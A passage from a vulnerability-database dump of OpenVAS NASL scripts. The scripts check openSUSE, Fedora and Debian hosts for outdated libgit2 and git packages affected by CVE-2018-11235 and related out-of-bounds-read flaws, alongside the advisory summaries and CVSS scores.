attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta\n file, which could be exploited by an attacker t ocause a denial of\n service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a\n crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing\n smart-protocol 'ng' packets (bsc#1104641)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-922=1\");\n\n script_tag(name:\"affected\", value:\"libgit2 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26\", rpm:\"libgit2-26~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-debuginfo\", rpm:\"libgit2-26-debuginfo~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-debugsource\", rpm:\"libgit2-debugsource~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-devel\", rpm:\"libgit2-devel~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit\", 
rpm:\"libgit2-26-32bit~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit-debuginfo\", rpm:\"libgit2-26-32bit-debuginfo~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-15T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-7d993184f6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875184", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d993184f6_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-7d993184f6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875184\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-15 07:10:23 +0200 (Mon, 15 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-7d993184f6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d993184f6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GMJJIDNEG42VDOEJZLJOIR6WEXXQGZ5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.7~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:38:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-27T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:3519-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501", "CVE-2018-8099"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852103", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852103\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\", \"CVE-2018-8099\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-27 06:25:10 +0200 (Sat, 27 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:3519-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3519-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00078.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the openSUSE-SU-2018:3519-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libgit2 fixes the following issues:\n\n - CVE-2018-8099: Fixed possible denial of service attack via different\n vectors by not being able to differentiate between these status codes\n (bsc#1085256).\n\n - CVE-2018-11235: With a crafted .gitmodules file, a 
malicious project can\n execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this\n file, and then appended to $GIT_DIR/modules, leading to directory\n traversal with '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design in which hooks are\n not obtained from a remote server. (bsc#1095219)\n\n - CVE-2018-10887: It has been discovered that an unexpected sign extension\n in git_delta_apply function in delta.c file may have led to an integer\n overflow which in turn leads to an out of bound read, allowing to read\n before the base object. An attacker could have used this flaw to leak\n memory addresses or cause a Denial of Service. (bsc#1100613)\n\n - CVE-2018-10888: A missing check in git_delta_apply function in delta.c\n file, may lead to an out-of-bound read while reading a binary delta\n file. An attacker may use this flaw to cause a Denial of Service.\n (bsc#1100612)\n\n - CVE-2018-15501: A remote attacker can send a crafted smart-protocol 'ng'\n packet that lacks a '\\0' byte to trigger an out-of-bounds read that\n leads to DoS. 
(bsc#1104641)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1314=1\");\n\n script_tag(name:\"affected\", value:\"libgit2 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24\", rpm:\"libgit2-24~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24-debuginfo\", rpm:\"libgit2-24-debuginfo~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-debugsource\", rpm:\"libgit2-debugsource~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-devel\", rpm:\"libgit2-devel~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24-32bit\", rpm:\"libgit2-24-32bit~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24-debuginfo-32bit\", rpm:\"libgit2-24-debuginfo-32bit~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2020-01-29T20:08:43", "description": "CVE-2018-15501\nA potential out-of-bounds read when processing a ", "cvss3": {}, "published": "2018-08-26T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for libgit2 (DLA-1477-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-10887", "CVE-2018-15501"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891477", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891477\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-15501\");\n script_name(\"Debian LTS: Security Advisory for libgit2 (DLA-1477-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-26 00:00:00 +0200 (Sun, 26 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"libgit2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\");\n\n script_tag(name:\"summary\", value:\"CVE-2018-15501\nA potential out-of-bounds read when processing a 'ng' smart packet\nmight lead to a Denial of Service.\n\nCVE-2018-10887\nA flaw has been discovered that may lead to an integer overflow which\nin turn leads to an out of bound read, allowing to read before the\nbase 
object. This might be used to leak memory addresses or cause a\nDenial of Service.\n\nCVE-2018-10888\nA flaw may lead to an out-of-bound read while reading a binary delta\nfile. This might result in a Denial of Service.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libgit2-21\", ver:\"0.21.1-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgit2-dbg\", ver:\"0.21.1-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgit2-dev\", ver:\"0.21.1-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-06T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-94eb743dad", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_94eb743dad_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-94eb743dad\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by 
the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874776\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-06 06:04:41 +0200 (Fri, 06 Jul 2018)\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-94eb743dad\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-94eb743dad\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JJ2UTQMKUC5NNGLZTBPGXZE5SO6TSRZ7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.4~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:56:07", "description": "Etienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.", "cvss3": {}, "published": "2018-05-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4212-1 (git - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704212", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704212", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4212-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in 
the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704212\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-11235\");\n script_name(\"Debian Security Advisory DSA 4212-1 (git - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 00:00:00 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4212.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"git on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\nWe recommend that you upgrade your git packages.\");\n\n script_xref(name:\"URL\", 
value:\"https://security-tracker.debian.org/tracker/git\");\n script_tag(name:\"summary\", value:\"Etienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"git\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-all\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-arch\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-core\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-sysvinit\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-doc\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-el\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-email\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-gui\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-man\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-mediawiki\", 
ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-svn\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitk\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitweb\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-all\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-arch\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-core\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-sysvinit\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-doc\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-el\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-email\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-gui\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-man\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-mediawiki\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-svn\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"gitk\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitweb\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-06T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-b10e54263a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874773", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874773", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b10e54263a_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-b10e54263a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY 